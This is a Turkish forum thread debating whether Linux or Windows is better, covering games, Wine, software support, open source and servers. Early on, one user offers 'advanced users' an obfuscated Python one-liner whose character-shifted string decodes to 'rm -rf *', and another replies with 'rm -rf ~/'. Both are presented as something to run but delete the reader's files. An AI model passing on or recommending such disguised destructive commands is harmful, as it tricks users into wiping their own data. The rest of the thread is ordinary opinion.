Neden Linux Daha İyi ??

karcx

Profesör
Reaksiyon puanı
39
Gereksiz bir tartışma...
Son kullanıcı için
Windows şu anda linuxtan daha iyi vede daha kullanışlı..
Not:
İleri seviye linux kullanan arkadaşlar için:
python derleyici ile aşağıdaki kodları derleyin:

python -c ’import os; os.system("".join([chr(ord(i)-1) for i
in "sn!.sg!+"]))’

HapS

Profesör
Reaksiyon puanı
63
böyle uğraşmalarına gerek yoh yeğenim kafadan rm -rf ~/ desinler yeter ne uğraştiriyorsun python mython :D

byndr

Asistan
Reaksiyon puanı
6
Ben şöyle misal vereyim
2 yıldızlı otelde bedava tatil yapacağıma 5 yıldızlıda parayla tatil yaparım. iki işlletim sisteminin farkı aynen böyle

karcx

Profesör
Reaksiyon puanı
39
böyle uğraşmalarına gerek yoh yeğenim kafadan rm -rf ~/ desinler yeter ne uğraştiriyorsun python mython :D
Yeğenim lafı hiç hoş laf değil....:angry::angry::angry:

Bilgi güçtür...
Linuxu çökertmek çok kolaydır.........

Exploit Coder

Profesör
Reaksiyon puanı
26
Ben şöyle misal vereyim
2 yıldızlı otelde bedava tatil yapacağıma 5 yıldızlıda parayla tatil yaparım. iki işlletim sisteminin farkı aynen böyle

normalde 5 yıldızlı otel linux 2 yıldızlı ise windows oluyor 2 yıldızlı olan deniz kenarında 5 yıldızlı olanda ise deniz yerine havuz var. 2 yıldızcı lar denizsiz yapamam havuz denizin yerini tutmaz diyorlar ve 5 yıldızlı otede bedava tatil yapacaklarına 2 yıldızlıda parayla yapıyorlar

oysaki denizde mikrop kapma olasılığı çok fazla havuz sürekli ilaçlandığı için böyle bir olasılık çok az

benim misalimde böyle

HapS

Profesör
Reaksiyon puanı
63
:D :D benden aldiğini bana satma yeğen meğen dinlemem basarim şamarı :D bu forumun linux düşmanı benim sen başka foruma git orda linux düşmanlığı yap

karcx

Profesör
Reaksiyon puanı
39
:D :D benden aldiğini bana satma yeğen meğen dinlemem basarim şamarı :D bu forumun linux düşmanı benim sen başka foruma git orda linux düşmanlığı yap

Arkadaşım hala yeğen lafını kullanıyorsun...
O lafı kullanma..........:censored::censored::censored::censored:

Bunları linuxta kendini geliştirmeye çalışan herkes bilir.........
Yani bunları bir çok yabancı kaynaklı forumlarda bulabilirsin.........
google sağolsun........

byndr

Asistan
Reaksiyon puanı
6
normalde 5 yıldızlı otel linux 2 yıldızlı ise windows oluyor 2 yıldızlı olan deniz kenarında 5 yıldızlı olanda ise deniz yerine havuz var. 2 yıldızcı lar denizsiz yapamam havuz denizin yerini tutmaz diyorlar ve 5 yıldızlı otede bedava tatil yapacaklarına 2 yıldızlıda parayla yapıyorlar

oysaki denizde mikrop kapma olasılığı çok fazla havuz sürekli ilaçlandığı için böyle bir olasılık çok az

benim misalimde böyle

Kusura bakma ama o havuza giren ve kendini insan sana çoğu kişi suyun içine ediyor.
oysa akar su pislik tutmaz. durgu suda abdest alınmaz akar suda ise abdest alınır. senin bahsettiğn linux a ben 2 yıldızı bile çok görüyorum.

Exploit Coder

Profesör
Reaksiyon puanı
26
Kusura bakma ama o havuza giren ve kendini insan sana çoğu kişi suyun içine ediyor.
oysa akar su pislik tutmaz. durgu suda abdest alınmaz akar suda ise abdest alınır. senin bahsettiğn linux a ben 2 yıldızı bile çok görüyorum.

senin havuz ve deniz muhabbetinden anladığın yanlış bir nokta var burda havuz ve deniz işletim sistemlerinin içindeki programlardır. havuz ve denizi işletim sistemine benzetseydim :

içine kimin işediği veya ne yaptığı belirsiz bir deniz var ve hergün birkaçkere ilaçlanan bir havuz var. ki havuzun içerisine birşey yapmaya kalktığınız anda birsürü insan bunu farkedip senin bu yanlışını düzeltecek veya düzelttirecektir ( bunu açık kaynak kod ve kodları kontrol eden gönüllüler ve linux topluluğu olarak düşünebilirsiniz) Denizin içinde ise çook çook derinlere gidip istediğin şeyi yapabilirsin ve kimse bunun farkında olmaz.( bunuda microsoftun kimseye açıklamadığı gizli kaynak kod olarak düşünelim)

ve farkındaysan çoğunluk linuxu kullanmama nedeni olarak program eksikliğini bahane ediyor istedikleri programlar linuxde olsaydı bir saniye düşünmezlerdi!

Gimp Uzmanı

Öğrenci
Reaksiyon puanı
0
Ben hala bazı şeyleri anlamadım. Neden sizdeki Linux nefreti anlamıyorum. HapS kendisini Linux düşmenı ilan ediyor. Bazıları Linux'a demediğini bırakmıyor. Tekrar Haps "destede kart biter linuxcularda dümen bitmez" diyor. Bende Linux kullanıcısıyım bana söylesenizde neden bu kadar Linux'ten nefret etmem gerektiğini bende kullanmayayım.

Ben Linux işletim sistemini neden kullandığımı biliyorum. Çünkü bana kullanma paylaşma ve değiştirme özgürlüğü veriyor. Kullandığınız Kapalı kaynak kodlu ve ücretli yazılımları paylaşamazsınız ve değiştiremezsiniz lisansları buna izin vermez. Programlar size makul bir ücret karşılığında satılır. Satın aldığınız programı sadece kullanma özgürlüğü size aitiir. Paylaşamazsınız suçtur. Değiştiremezsiniz suç işlemiş olursunuz. Neden bu kadar kapalı kod sevdasına sahipsiniz.

tony_almeida

Doçent
Reaksiyon puanı
4
Linux genel olarak daha iyi ama
bir windows'a uyumluluk modu gibi birşey yapsalar yaw:D
özellikle oyunlar için, istediğim oyunu çalıştıracağımı bilsem(Fifa, Race Driver Grid gibi) Windows 7 medi demem linux'a geçerim

Finix

Daha mükemmel bir Troy
Reaksiyon puanı
2,285
Virtualbox kur oradan microXP ile xp oyunlarını oynasınlar :D

Gimp Uzmanı

Öğrenci
Reaksiyon puanı
0
Benim pek oyun merakın olmadığı için problem yaşamıyorum. Hatta gayet memnunum desem yalan olmaz. En iyisi Linux Debian / Sid / XFCE4

Exploit Coder

Profesör
Reaksiyon puanı
26
Linux genel olarak daha iyi ama
bir windows'a uyumluluk modu gibi birşey yapsalar yaw:D
özellikle oyunlar için, istediğim oyunu çalıştıracağımı bilsem(Fifa, Race Driver Grid gibi) Windows 7 medi demem linux'a geçerim

işte tam benim biraz önce verdiğim deniz ve havuz örneği gibi birşey. Ama 2010 da bekli wine projesi yardımıyla her oyun linuxde sorunsuz çalışabilecek.

zaten bir arkadaşımız dirext desteğini nasıl sağlayacak demiş. linuxde sen hiç birşey yapmasanda dirext desteğini sağlıyor.

bu dediklerim olduğu zaman bill gates bu kazandığı paraların hepsini linux u satın almak için uğraşıcak :mrgreen:

Exploit Coder

Profesör
Reaksiyon puanı
26
bazen bir resim bin kelimeye bedeldir...
ekrangrnts1.png

adem54

Doçent
Reaksiyon puanı
0
Linux daha iyi değil ki ne kadar yazarsan yaz Linux bilgisayarın işlevlerini sınırlandırıyor... hiç bir programı desteklemiyor. Üreticilerin %99 u haklı olarak sadece windows'a program yapıyor

Exploit Coder

Profesör
Reaksiyon puanı
26
Linux daha iyi değil ki ne kadar yazarsan yaz Linux bilgisayarın işlevlerini sınırlandırıyor... hiç bir programı desteklemiyor. Üreticilerin %99 u haklı olarak sadece windows'a program yapıyor
bilgisayarın işlevlerini kullanıcı için sınırlandıranlar programcılardır ,senin kullandığın her hangi bir program linux için yazılmış olsaydı böyle konuşamazdın.

adem54

Doçent
Reaksiyon puanı
0
işte yazmıyorlar, daha kolay bir alt yapısı olsaydı belki üreticiler linuxa kayardı.

Exploit Coder

Profesör
Reaksiyon puanı
26
işte yazmıyorlar, daha kolay bir alt yapısı olsaydı belki üreticiler linuxa kayardı.

zor olduğunu kim söylediki. bazıları insanların çoğunluğu windows kullanıyor diye windowsa göre yapıyor ( bu döngüyü daha önceki mesajlarımda açıklamıştım) bazılarının ise açık kaynak kod işine gelmediği için...

adem54

Doçent
Reaksiyon puanı
0
Herneyse linux sevenler ve uzmanları linuxu savunur, oyun severler ve programcılar ise windowsu bunun sonu gelmez

oyuncu olarak ben windows taraftarıyım ama elimde ubuntu ve pardus işletim sistemleri var çok uzun soluklu olmasada arada sırada kurup bakınıyorum, msn ve webde dolaşmaktan başka HİÇBİR ŞEY yapamadığım için tekrar windows :)

Exploit Coder

Profesör
Reaksiyon puanı
26
Herneyse linux sevenler ve uzmanları linuxu savunur, oyun severler ve programcılar ise windowsu bunun sonu gelmez

oyuncu olarak ben windows taraftarıyım ama elimde ubuntu ve pardus işletim sistemleri var çok uzun soluklu olmasada arada sırada kurup bakınıyorum, msn ve webde dolaşmaktan başka HİÇBİR ŞEY yapamadığım için tekrar windows :)

sadece windows programcıları yok. Oyun konusunda haklısın . ama oyun oynamayan biri için veya bir programcı için linux bir nimet. gerçi bi projeden bahsetmiştim Wine projesi. artık bazı oyunlarda wine programıyla linuxta sorunsuz çalışabiliyor. ama yinede %100 garanti veremez kimse..

adem54

Doçent
Reaksiyon puanı
0
sanırım mario çalışabilir :)

wine'ı biliyorum. cod 5, crysis gibi zımbırtıları çalıştıramaz. ya zaten çalıştırsa bile oyundan kalite alamıyorsunuz bunu sizde biliyorsunuz,

Exploit Coder

Profesör
Reaksiyon puanı
26
illaki bir oyuna bağımlıysanız sizi windowstan vazgeçiremeyiz zaten ama şöyle şöyle bir oyun arıyorum derseniz linux versiyonlarına sahip oyunlarıda bulabilirsiniz ben call of duty 2 ve 5 e çok meraklıydım 2.dünya savaşı oyunları hoşuma gidiyordu. araştırdım. wine ile hem cod2 sorunsuz çalışıyor hemde cod2 den daha iyi bir oyun linux için :

Wolfenstein : Enemy Territory

çok muhteşem bir oyundur..( en azından benim için ). işte alternatif :)

Finix

Daha mükemmel bir Troy
Reaksiyon puanı
2,285
Gerçekten ya şu bende olan need for speed hastalığı olmasaydı sistemde vista diye bir şey kalmazdı ;)

GKHNCKR

Profesör
Reaksiyon puanı
47
ne ekran kartımın driverlarını kaldırır nede ses kartımın driverlarını tanır. ne yapacam linux'u. Şu günlerde sadece sunucu tarafında dikkatimi çekiyor. CentOS üstünde bir kaç web, mail server kuracam bakalım. Server tarafından performans olarak microsoft ürünlerinden iyi..

Finix

Daha mükemmel bir Troy
Reaksiyon puanı
2,285
Linuxun en iyi olduğu konu serverdır bence dene.